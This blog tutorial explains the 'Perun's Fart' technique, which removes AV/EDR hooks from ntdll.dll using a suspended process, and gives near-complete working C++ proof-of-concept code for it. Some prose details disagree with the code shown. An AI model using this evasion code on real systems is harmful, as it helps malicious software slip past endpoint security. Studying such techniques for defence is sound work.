API Unhooking with Perun's Fart
Pre-requisites
To fully understand this topic, one needs to have some knowledge about the following concepts:
- Little bit of C++ programming
- Some knowledge of API hooking by AV/EDR software
- Basic understanding of the PE structures
- Basic knowledge about Win32 APIs and their workings
Introduction
Recently, while going through some malware evasion techniques, I came across a very new and uncommon technique, called Perun’s Fart in a Blog by Sektor7. This is a novel technique, which primarily focuses on retrieving a fresh unhooked copy of the ntdll.dll
.
This is done by creating a process in a suspended state. Now, this suspended process will not have any functions hooked by the EDR. According to the original blog, this takes advantage of the fact that, there is a gap between new process being spawned and the AV/EDR injecting their custom DLL. We will dive into this topic later on.
So, we copy the syscall stubs from the fresh ntdll.dll
into our current process. Thus, giving us an unhooked version.
Overview of the technique
- First we need to create a process in a suspended state
- Then we need to find the base address of the
ntdll.dll
of our current process - Since the created process is a child process of our current process, the base address of
ntdll.dll
will be same - Therefore, we read the complete
ntdll.dll
from the suspended process - Then we parse the Export Directory of both the fresh
ntdll.dll
and that of our current process - We look for
Nt
APIs and extract the syscall stubs from freshntdll.dll
and copy them to thentdll
of our current process - Then we can terminate the suspended process and continue with our malicious code. (Although, in this POC I have not used and injection code.)
Implementing the first part of the code
For this I will be using C++ as my language of choice. This is because, I find it easier to work with some in-built structures and some APIs. I will try to break down the technique into smaller parts and get into each detail. I have tried to add my own improvements on top of the C# code by packyhacker, which I believe is more authentic to the Windows Evasion Course by Sektor7
Refer to my original POC : https://github.com/dosxuz/PerunsFart
Why suspended process?
To get a fresh copy of ntdll
we need to create a suspended process as already stated. We need to read that ntdll.dll
from the suspended process. But why is the ntdll
in the suspended process not hooked? I got this answer to some extent from this StackOverflow thread.
According to this thread, only ntdll.dll is initially mapped, and an APC is queued to run when the thread resumes. This calls ntdll!LdrpInitializeProcess
, which initializes the execution environment (e.g. language support, the heap, thread-local storage, the KnownDlls
directory), loads kernel32.dll and gets the address of BaseThreadInitThunk
, does static DLL imports, breaks for an attached debugger, and runs the init routines. Then execution jumps to ntdll!RtlUserThreadStart
, which calls kernel32!BaseThreadInitThunk
, which calls the EXE’s entry point such as WinMainCRTStartup
Therefore, we can understand that when the process is started, first the ntdll.dll
is only mapped. For this reason, if you attach to a suspended process using x64Dbg, you’ll find that only the ntdll.dll
is there in the modules list.
Now, since the process is in a suspended state, the APC which is queued is also not run. This in turn will not call LdrpInitializeProcess
, as a result the rest of the modules are not loaded.
As we can see in the above picture, only the ntdll.dll
and the program itself is loaded.
NOTE: If you’re using a debugger like WinDbg, it will force the loading of other modules, as soon as you attach to the process
Reading fresh ntdll
Now, that we know why we need a suspended process to get a fresh copy of the ntdll
, we need to implement it.
- First we need to create a process in a suspended state using
CreateProcessA
API. We can do that as follows - The following code is inside the
main()
function
STARTUPINFOA* si = new STARTUPINFOA();
PROCESS_INFORMATION* pi = new PROCESS_INFORMATION();
//BOOL stat = CreateProcessA_p(nullptr, (LPSTR)"C:\\Windows\\System32\\svchost.exe", nullptr, nullptr, FALSE, CREATE_SUSPENDED, nullptr, nullptr, si, pi);
BOOL stat = CreateProcessA_p(nullptr, (LPSTR)"cmd.exe", nullptr, nullptr, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, nullptr, "C:\\Windows\\System32\\", si, pi);
HANDLE hProcess = pi->hProcess;
printf("PID : %d\n", pi->dwProcessId);
- Finding the base address of
ntdll.dll
by traversing through the loaded modules in the process - For this, we use a custom function by paranoidninja. Here it is named as
GetDll()
WCHAR findname[] = L"ntdll.dll\x00";
PVOID ntdllBase = GetDll(findname);
printf("ntdll.dll base address : 0x%p\n", ntdllBase);
- We pass the name of the DLL whose base address we want to locate (in this case the
ntdll.dll
), and the function returns its base address. - The following is the code of
GetDll()
function
PVOID GetDll(PWSTR FindName)
{
_PPEB ppeb = (_PPEB)__readgsqword(0x60);
ULONG_PTR pLdr = (ULONG_PTR)ppeb->pLdr;
ULONG_PTR val1 = (ULONG_PTR)((PPEB_LDR_DATA)pLdr)->InMemoryOrderModuleList.Flink;
PVOID dllBase = nullptr;
ULONG_PTR val2;
while (val1)
{
PWSTR DllName = ((PLDR_DATA_TABLE_ENTRY)val1)->BaseDllName.pBuffer;
dllBase = (PVOID)((PLDR_DATA_TABLE_ENTRY)val1)->DllBase;
if (wcscmp(FindName, DllName) == 0)
{
break;
}
val1 = DEREF_64(val1);
}
return dllBase;
}
- The above function, uses the intrinsic
__readgsqword()
to read0x60
bytes from thegs
register. This will give us the pointer to thePEB
(Process Environment Block) - From the
PEB
structure, we find the address of the Loader data orLdr
- Then we traverse through the loaded modules using the
Ldr
in order to get our required base of thentdll
Extracting Loaded Modules through the Loader Data
Before we move further, we need to understand the concept of how different modules are accessed and loaded in a process. For this, we will take help of WinDbg.
- The
Process Environment Block (PEB)
has aLdr
structure at offset0x018
. We can view the structure ofPEB
usingdt nt!_PEB
- This
Ldr
is of typePEB_LDR_DATA
. We can get the address ofLdr
by using the command!peb
- Now if we view the data at address
0x00007ffb38f1a4c0
as typePEB_LDR_DATA
, we find the following
- We see that there are 3 doubly linked lists
InLoadOrderModuleList, InMemoryOrderModuleList
andInLoadOrderModuleList
. These are of typeLIST_ENTRY
which have nested structure of typeLDR_DATA_TABLE_ENTRY
- Therefore, we can typecast these structures as
LDR_DATA_TABLE_ENTRY
dt nt!_LDR_DATA_TABLE_ENTRY 0x000002d2`270d2ef0
- Here we take the starting address of the structure
InLoadOrderModuleList
for the example. - Once, we typecast it into
LDR_DATA_TABLE_ENTRY
, we will have the starting address of the next link.
- We see that the first loaded module is the program itself
cmd.exe
- Now, we have the starting address of the next link
0x000002d2270d2d20
, which we can use to typecast
dt nt!_LDR_DATA_TABLE_ENTRY 0x000002d2`270d2d20
- We find that the next loaded module is
ntdll.dll
- Along with the name, we also get the base address.
This technique essentially reduces our dependency on the API GetModuleHandle
, which in some cases might be hooked or blacklisted.
Reading the entire ntdll with NtReadVirtualMemory
Now that we have the base address of the fresh ntdll
, we need to read it. Since, the suspended process that we have created, is a child process of our current process, the base address of the ntdll
will be the same. Therefore, we can use this same address to read from the suspended process.
- Before reading from the suspended process, we need to know how many bytes we have to read.
- We can get this from the
SizeOfImage
entry from theOptionalHeader
structure. - We can parse the optional header as follows:
PIMAGE_DOS_HEADER ImgDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
PIMAGE_NT_HEADERS ImgNTHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + (ImgDosHeader->e_lfanew));
IMAGE_OPTIONAL_HEADER OptHeader = (IMAGE_OPTIONAL_HEADER)ImgNTHeaders->OptionalHeader;
PIMAGE_SECTION_HEADER textsection = IMAGE_FIRST_SECTION(ImgNTHeaders);
DWORD ntdllSize = OptHeader.SizeOfImage;
-
First we typecast the base of
ntdll
toDOS Header
structure -
Next, we add the value of
e_lfanew
with the base of the image, in order to get theNT Headers
-
Once we have the
NT Headers
we can obtain theOptional Header
from it -
We also need to extract the
.text
section fromNT Headers
using the macroIMAGE_FIRST_SECTION()
. This will be used later on. -
Now that we have the size of
ntdll
image, we need to allocate memory of the same size usingVirtualAlloc
LPVOID freshNtdll = VirtualAlloc(NULL, ntdllSize, MEM_COMMIT, PAGE_READWRITE);
- Then we use
NtReadVirtualMemory
to read that same number of bytes from the suspended process, with thentdll
base address
DWORD bytesread = NULL;
printf("Fresh NTDLL : 0x%p\n", freshNtdll);
NtReadVirtualMemory_p(hProcess, ntdllBase, freshNtdll, ntdllSize, &bytesread);
Now we will have the fresh ntdll
in the address freshNtdll
Unhooking the current ntdll
We now need to extract the syscall stubs of the Nt
functions from the fresh ntdll
and overwrite on the Nt
functions of the hooked ntdll
.
This whole things is done through the DoShit()
function
DoShit(ntdllBase, freshNtdll, textsection);
It takes the parameters ntdllBase
(the hooked ntdll
), freshNtdll
(the unhooked version from current process), textsection
(the text section of the current ntdll
)
Getting the Export Directory
- The
DoShit()
function looks as follows
void DoShit(PVOID ntdllBase, PVOID freshntDllBase, PIMAGE_SECTION_HEADER textsection)
{
PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
if (!GetImageExportDirectory(freshntDllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
printf("Error\n");
PIMAGE_EXPORT_DIRECTORY hooked_pImageExportDirectory = NULL;
if (!GetImageExportDirectory(ntdllBase, &hooked_pImageExportDirectory) || hooked_pImageExportDirectory == NULL)
printf("Error\n");
OverwriteNtdll(ntdllBase, freshntDllBase, hooked_pImageExportDirectory, pImageExportDirectory, textsection);
}
-
The first function that we need to use is
GetImageExportDirectory()
-
It takes the base address of
ntdll
(it takes both the hooked and unhooked versions in two different calls) -
First we get the
Export Directory
of the freshntdll
and then theExport Directory
of the hookedntdll
-
The
GetImageExportDirectory
works as follows :
BOOL GetImageExportDirectory(PVOID ntdllBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory)
{
//Get DOS header
PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
return FALSE;
}
PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)ntdllBase + pImageDosHeader->e_lfanew);
if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
return FALSE;
}
// Get the EAT
*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)ntdllBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
return TRUE;
}
- It first gets the pointer to the
DOS Header
from the image base - Then it gets the pointer to the
NT Headers
by adding the value ofe_lfanew
to the image base - From the
Optional Header
it takes the arrayDataDirectory
and adds the virtual address of the entry at offset0
- This is because the entry at offset
0
is that of theExport Directory
. We can confirm this from CFF Explorer
- Therefore, we have the pointer to the export tables of both the hooked and unhooked versions of
ntdll
Extracting addresses of Nt APIs
- After getting the
Export Directories
of both the versions of DLLs, we call theOverwriteNtdll
function - It takes the
Export Directories
of both the versions ofntdll
void OverwriteNtdll(PVOID ntdllBase, PVOID freshntDllBase, PIMAGE_EXPORT_DIRECTORY hooked_pImageExportDirectory, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PIMAGE_SECTION_HEADER textsection)
{
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfNameOrdinals);
for (WORD cx = 0; cx < hooked_pImageExportDirectory->NumberOfNames; cx++) {
PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
if (strstr(pczFunctionName, (CHAR*)"Nt") != NULL)
{
PVOID funcAddress = GetTableEntry(freshntDllBase, pImageExportDirectory, pczFunctionName);
if (funcAddress != 0x00 && std::strcmp((CHAR*)"NtAccessCheck", pczFunctionName) != 0)
{
printf("Function Name : %s\n", pczFunctionName);
printf("Address of Function in fresh ntdll : 0x%p\n", funcAddress);
//Change the write permissions of the .text section of the ntdll in memory
DWORD oldprotect = ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), PAGE_EXECUTE_READWRITE, textsection->Misc.VirtualSize);
//Copy the syscall stub from the fresh ntdll.dll to the hooked ntdll
std::memcpy((LPVOID)pFunctionAddress, (LPVOID)funcAddress, 23);
//Change back to the old permissions
ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), oldprotect, textsection->Misc.VirtualSize);
}
}
}
printf("Completed Overwriting ntdll.dll\n");
getchar();
}
- This function in turn calls the
GetTableEntry()
function (Taken from HellsGate by am0nsec, which takes the base address of thentdll
and theExport Directory
of that same version of thentdll
, as well as the name of the function, whose address we want to extract.
PVOID GetTableEntry(PVOID ntdllBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, CHAR* findfunction)
{
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfNameOrdinals);
PVOID funcAddress = 0x00;
for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
if (std::strcmp(findfunction, pczFunctionName) == 0)
{
WORD cw = 0;
while (TRUE)
{
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
{
return 0x00;
}
// check if ret, in this case we are also probaly too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
{
return 0x00;
}
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
WORD syscall = (high << 8) | low;
//printf("Function Name : %s", pczFunctionName);
//printf("Syscall : 0x%x", syscall);
return pFunctionAddress;
break;
}
cw++;
}
}
}
return funcAddress;
}
- Although I have modified it to suite our current requirements, but the core concept remains the same
- This function first initializes the variables for storing the address of the functions, the address of the function names, and the address of Name Ordinals
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfNameOrdinals);
- It initializes the function address as
0x0
PVOID funcAddress = 0x00;
- It then iterates through all the function names in the
Export Directory
by using theImageExportDirectory->NumberOfNames
as the upper limit
for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
if (std::strcmp(findfunction, pczFunctionName) == 0)
{
WORD cw = 0;
while (TRUE)
{
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
{
return 0x00;
}
// check if ret, in this case we are also probaly too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
{
return 0x00;
}
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
WORD syscall = (high << 8) | low;
//printf("Function Name : %s", pczFunctionName);
//printf("Syscall : 0x%x", syscall);
return pFunctionAddress;
break;
}
cw++;
}
}
}
- The outer
for
loop first calculates, the address of the function name (converts it tochar
pointer), and the address of the function
PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
- As soon as it finds the function name that we are looking for, it goes inside a second
while
loop
if (std::strcmp(findfunction, pczFunctionName) == 0)
{
WORD cw = 0;
while (TRUE)
{
- Then we have the following code inside the
while
loop
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
{
return 0x00;
}
// check if ret, in this case we are also probaly too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
{
return 0x00;
}
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
WORD syscall = (high << 8) | low;
//printf("Function Name : %s", pczFunctionName);
//printf("Syscall : 0x%x", syscall);
return pFunctionAddress;
break;
}
cw++;
- In this code, the variable
cw
of typeWORD
is used to point to various bytes, starting from the function address - The first
if
statement checks whether the first two bytes are0x0f
and0x05
or not. In this case we have the opcodes for thesyscall
.
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
{
return 0x00;
}
- The next
if
statement check whether the current byte is0xc3
or not. In this case we have reached theret
instruction.
// check if ret, in this case we are also probaly too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
{
return 0x00;
}
-
In both the cases, it will be treated as an error and will return with the function address as
0x0
-
But in the third
if
statement, it finds that the first 4 bytes are0x4c, 0x8d, 0xd1, 0xb8
, and the bytes at 7th and 8th positions are0x0
. This means that we are exactly at the syscall stub.
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
WORD syscall = (high << 8) | low;
//printf("Function Name : %s", pczFunctionName);
//printf("Syscall : 0x%x", syscall);
return pFunctionAddress;
break;
}
- From here we can either successfully extract the syscall (for some other techniques like Hell’s Gate) or we can return the address of the function. This was important to make sure that we landed on the extract entry point of a
Nt
function.
Understanding the OverwriteNtdll function
Now that we know how the GetTableEntry
function works, we can start with the OverwriteNtdll
function.
void OverwriteNtdll(PVOID ntdllBase, PVOID freshntDllBase, PIMAGE_EXPORT_DIRECTORY hooked_pImageExportDirectory, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PIMAGE_SECTION_HEADER textsection)
{
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfNameOrdinals);
for (WORD cx = 0; cx < hooked_pImageExportDirectory->NumberOfNames; cx++) {
PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
if (strstr(pczFunctionName, (CHAR*)"Nt") != NULL)
{
PVOID funcAddress = GetTableEntry(freshntDllBase, pImageExportDirectory, pczFunctionName);
if (funcAddress != 0x00 && std::strcmp((CHAR*)"NtAccessCheck", pczFunctionName) != 0)
{
printf("Function Name : %s\n", pczFunctionName);
printf("Address of Function in fresh ntdll : 0x%p\n", funcAddress);
//Change the write permissions of the .text section of the ntdll in memory
DWORD oldprotect = ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), PAGE_EXECUTE_READWRITE, textsection->Misc.VirtualSize);
//Copy the syscall stub from the fresh ntdll.dll to the hooked ntdll
std::memcpy((LPVOID)pFunctionAddress, (LPVOID)funcAddress, 23);
//Change back to the old permissions
ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), oldprotect, textsection->Misc.VirtualSize);
}
}
}
printf("Completed Overwriting ntdll.dll\n");
getchar();
}
- This function works in a similar fashion as that of
GetTableEntry
but instead of check for the syscall stub, it checks if the function is aNt
function or not.
if (strstr(pczFunctionName, (CHAR*)"Nt") != NULL)
{
PVOID funcAddress = GetTableEntry(freshntDllBase, pImageExportDirectory, pczFunctionName);
if (funcAddress != 0x00)
{
printf("Function Name : %s\n", pczFunctionName);
printf("Address of Function in fresh ntdll : 0x%p\n", funcAddress);
//Change the write permissions of the .text section of the ntdll in memory
DWORD oldprotect = ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), PAGE_EXECUTE_WRITECOPY, textsection->Misc.VirtualSize);
//Copy the syscall stub from the fresh ntdll.dll to the hooked ntdll
std::memcpy((LPVOID)pFunctionAddress, (LPVOID)funcAddress, 23);
//Change back to the old permissions
ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), oldprotect, textsection->Misc.VirtualSize);
}
}
-
If it is a
Nt
function, then it extracts the function address of that same function from thefresh ntdll
-
Then it checks if there has been any error, by check if the
funcAddress
is0x00
or not -
Before we can overwrite the hooked API, with the correct bytes, we need to change the access permissions of that memory region. Here I am using
PAGE_EXECUTE_WRITECOPY
, which is the bare minimum permission that we need
DWORD oldprotect = ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), PAGE_EXECUTE_WRITECOPY, textsection->Misc.VirtualSize);
- The
ChangePerms()
function works as follows:
DWORD ChangePerms(PVOID textBase, DWORD flProtect, SIZE_T size)
{
DWORD oldprotect;
VirtualProtect(textBase, size, flProtect, &oldprotect);
return oldprotect;
}
- After changing the permissions of the memory region for writing we use
memcpy
to write23
bytes to that memory region. - The size of the complete syscall stub is
23
bytes
std::memcpy((LPVOID)pFunctionAddress, (LPVOID)funcAddress, 23);
- Once we have overwritten with the clean bytes, we can now change the permissions back to its original
ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), oldprotect, textsection->Misc.VirtualSize);
Tying up loose ends
- Once our purpose of unhooking the
ntdll
is completed, we can now finally terminate the suspended process using theTerminateProcess
API
TerminateProcess(hProcess, 0);
Testing the POC
Now that we have completely understood the working of our POC, we can test it against any AV/EDR. The POC does not have any injection code which can lead to code execution. This is because, it will help us to understand the code fully without straying further away from the nuances of the actual technique. Also, it takes a lot more work to get an agent callback against the EDR that I was testing my code against. This POC just focuses on the unhooking aspect of the technique.
- In order to test the POC, we need our program to wait for a user input before unhooking. During this time, we can attach a debugger to it
- Here we can see that our program is waiting for user input. Now attach x64Dbg to it
- We can see both the suspended process and the parent process
- We attach debugger to the parent process
- Search for the
NtCreateThread
API from thentdll.dll
module - This is because, most AV/EDRs don’t hook each and every function, in order to reduce the amount computation power needed as well as to reduce false positives.
-
Checking the function, we see that there is a
jmp
statement for this function, instead of the syscall stub. However, this is not the case with the next function. -
This is because,
NtCreateThread
is widely used by malwares. -
Now we continue with the execution of our program by pressing enter
- We see that it has successfully executed
- Now lets check on the
NtCreateThread
API
- We see that there is now a normal syscall stub instead of the
jmp
statement as we had seen previously. - This shows that we have successfully unhooked the
ntdll.dll
of the current process using a novel technique
Conclusion
This technique, is indeed a very interesting and fun way to unhook ntdll
. It takes into consideration the basic fact that when a process is created, at first only the ntdll.dll
is loaded and then the other modules and takes advantage of it at very well.
However, while writing this code, and giving my own additions into it at the same time, I felt that technique is becoming unnecessarily complex. There can be other ways to make it simpler and better, but it all comes down to the fact, that there are still so many better evasion techniques than this. Also, to over the hooked ntdll
you need to change the permissions of the memory region to PAGE_EXECUTE_READWRITE
or PAGE_EXECUTE_WRITECOPY
, which can be easily flagged by most AV/EDR softwares.
While working on this POC, I learned a lot about how modules are loaded in processes and how you can navigate through the Export Table
. That’s what makes it a great learning experience for me, and I’d love to take the courses offered by Sektor7. Even with the simple blog, they have inspired me to hop into the rabbit hole and emerge as a more knowledgeable hacker.
All credits for the original concept and theory goes to Sektor7.
My POC code at : https://github.com/dosxuz/PerunsFart
References
- https://blog.sektor7.net/#!res/2021/perunsfart.md
- https://github.com/plackyhacker/Peruns-Fart
- https://github.com/am0nsec/HellsGate/blob/master/HellsGate/main.c
- https://github.com/paranoidninja/PIC-Get-Privileges/blob/main/addresshunter.h
- https://www.ired.team/offensive-security/defense-evasion/retrieving-ntdll-syscall-stubs-at-run-time